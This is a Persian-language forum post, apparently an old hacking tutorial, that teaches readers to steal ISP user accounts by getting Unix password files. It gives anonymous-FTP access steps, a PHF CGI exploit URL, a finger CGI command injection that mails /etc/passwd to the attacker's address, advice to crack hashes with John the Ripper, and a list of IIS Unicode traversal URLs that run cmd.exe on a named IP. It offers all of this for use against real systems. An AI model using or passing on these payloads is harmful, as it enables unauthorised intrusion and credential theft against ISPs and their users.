سلام ! فكر كنم اين تاپيك اون اولا موضوعش اكانت هكينگ بوده
خوب اين كار n راه داره اما اينو بدون كه سايتها انقدا هم درپيت نيستن كه بشه راحت ازشون اكانت پيچوند و عشق دنيا رو كرد !
من يه چندتا راه رو مي گم كه اگه سعي كني و دنبالشو بگيري حتما يادمي گيري ! ببين براي بدست آوردن يوزرنيم و اكانت هاي يك آي اس پي بايد به هاردسرور اون آي اس ژي متصل بشي !در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي هكر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شكا يك فايل Passwdرا باز كنيد چنين نوشته هايي را مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys
1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
KsN:3A62i9qr:1012:10:Mashhad
در اينجا مثلا ksn نام IDو 3a62...كلمه ي عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكنمي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:*
1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
KsN:*:1012:10:mashhad BFH:/home/user/KsN:/usr/local/bin/tcsh
حالا از اول يكم راحت تر اين روش رو كه حمله از طريق dos هست رو ميگم
بعد از اتصال كامل بايد از آي اس پي تون يه whois بگیرید ! اگه سایت مورد نظرتون برای org , net , com است من
www.samspade.org رو پیشنهاد می کنم ! و روششم اینطوری هست :
http://www.samspade.org/t/whois?a=ksn.com
كه بجاي KsN.com آدرس سایت مورد نظرتون رو بنویسید حالا یه صفحه باز میشه که کلی اطلاعات در مورد این سایت نوشته ما با اونا کارنداریم فقط باید دنبال کلمه Domain servers یا بعضی موقه ها اگه اون نبود دنبال DNS Servers می گردیم که یا بالای صفحه هست یا پایین !
حالا وارد قسمت Command Prompt بشيد كه همون داس خودمونه تایپ کنید !
FTP
http://www.domain.com
كه Domainآدرس سرور ISP هستش که اون بالا توضیح دادم بعد از شما خواسته مي شه تا آيدي خودتونو وارد كنيد كلمه ي Anonymousرا بزنيد وقتي درخواست كلمه عبور شد كليد Enterرا بزن .اگر وارد سيستم شدي موفق شده اي در غير اين صورت جمله ي login failedدريافت مي شه . خوب پس این دفعه Password رو آدرس یه Emailاي را وارد كن .اگر اين بار هم جواب نداد اين دفعه روش هاي زیر رو امتحان کن :
FTP ftp.domain.com
خلاصه تمام تلاش خودتو براي فهميدن روش دستيابي به سيستم بكن اگر توانستيد وارد سيستم بشي به راحتي مي تواني وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيري ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا بلد باشی براي اینکه دستورات رو ببینید ? رو تايپ كنيد . حالا به شاخه ي ETCبرو مي تواني فايل passwdرا در آنجا پيدا كني .اين فايل را بگير .اگر تو اونجا نبود شاخه هاي ديگه رو امتحان کن . ولي به احتمال زياد همونجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كن .
http://www.domain.com/cgi-bin/phf?Q...t /etc/passwd
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام بده .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كن .
www.domain.com/cgi-bin/finger
اگر اين آدرس كار كنه كادري جلوت ظاهر مي شه كه ازت می خواد نام مورد نظر خود را وارد کنی آدرس زير را وارد كنيد .
[email protected] ; /bin/mail
[email protected] < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس
[email protected]آدرس Emailشماست مثلا اين يك نمونه است .
[email protected] ; /bin/mail
[email protected] < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس
[email protected]
پست مي شi !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش بشي .
حالا اگر يه فايل مثل نمونه ي اولي كه در بالا بود گير آوردي مي تواني كار خود را ادامه بدي حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jack هستش .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني
www.hackersclub.com/km/frontpageبه دست بياوري ! اين روشهاي بالايي ماله سيستم هاي يونيكس هست كه الان تقريبا هفتاد درصد از يونيكس استفاده مي كنند !
روش بعدي استفاده از اسكريپت ها هست كه صد در صد عملي هست اما يكم مشكل هست !
تو اين روش شما بايد روش exploit و نوشتن اسكريبتها رو بلد باشيو بدون هيچ تروجان بك دوري مي توني وارد هارد سرور بشي !
اين روش اينطوري هست كه بعد از بدست آوردن سرور بايد آي پي سرور رو هم بدست بياري براي بدست آوردن آي پي سرور از فرمان nslookup تو داس استفاده مي كنيم !
C:\>nslookup
كه بعد از تايژ اين فرمان يه چيزايي مياد و آخرين سطر يه علامت < هست كه شما بايد جلوي اون آدرس سرور رو بنويسيد مثلا :
server s1.ksn.com<
كه جواب ميشنويم
Default Server: s1.ksn.com
Address: 194.165.8.60
حالا بايد بانوشتن اسكريبت ها وارد هارد سرور بشيم !
من در مورد نوشتن اسكريپت ها چيزي نمي گم چون كه با يه كي دو خط نمي شه چيزي فهميد !
شما بعد از نوشتن اسكريپت مي تونيد به شكل زير ازش استفاده كني !
http://serverip/script
كه به جاي serverip آي پي سرور بدست اومده رو مي نويسيم و به جاي script هم اون اسكريژتي كه نوشتيم حالا خيلي راحت وارد هارد سرور مي شي ! من نا اميدت نمي كنم امتحان كن يه نرم افزار برات معرفي مي كنم كه اين اسكريپت هارو سرچ مي كنه ! اما كامل نيست و زياد نميشه بهش تكيه كرد از این
http://www.astalavistalab.com/files/cgis4.zip آدرس دانلود کنید اسمشم CGI Scanner هست !
روش كارشم اينه كه آدرس آي پي سرور رو تو قسمت و Url مينويسي و از منوي rule set گزینه scan all رو تایپ می کنی ! البنه می تونی مستقیما آدرس سایت رو تو قسمت Url بنویسی اما درصد خطا خیلی زیاد می شه ! من یه چند تا اسکرپت رایج رو برات می گم ! البته برای هر سرور یه اسکریپت جواب میده :
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
TTP://194.165.8.60/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
HTTP://194.165.8.60/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
راه های دیگه ای هم هستن مثل تروجانهای بک دور و ... اما هم مشکل ترن هم اینکه به خاطر فایروال ها و ... دیر و خیلی سخت به نتیجه می شه رسید ! من که نه اطلاعاتی دارم نه چیزی ولی اینارو گفتم که به xnux عزیز بگم اینطور نیست که کسی دوست نداشته باشه دیگران از اطلاعاتش استفاده کنن بلکه مشکل اینجاست که کسی حوصله دردسر تراشی برای خودش نداره ! + موفق باشید !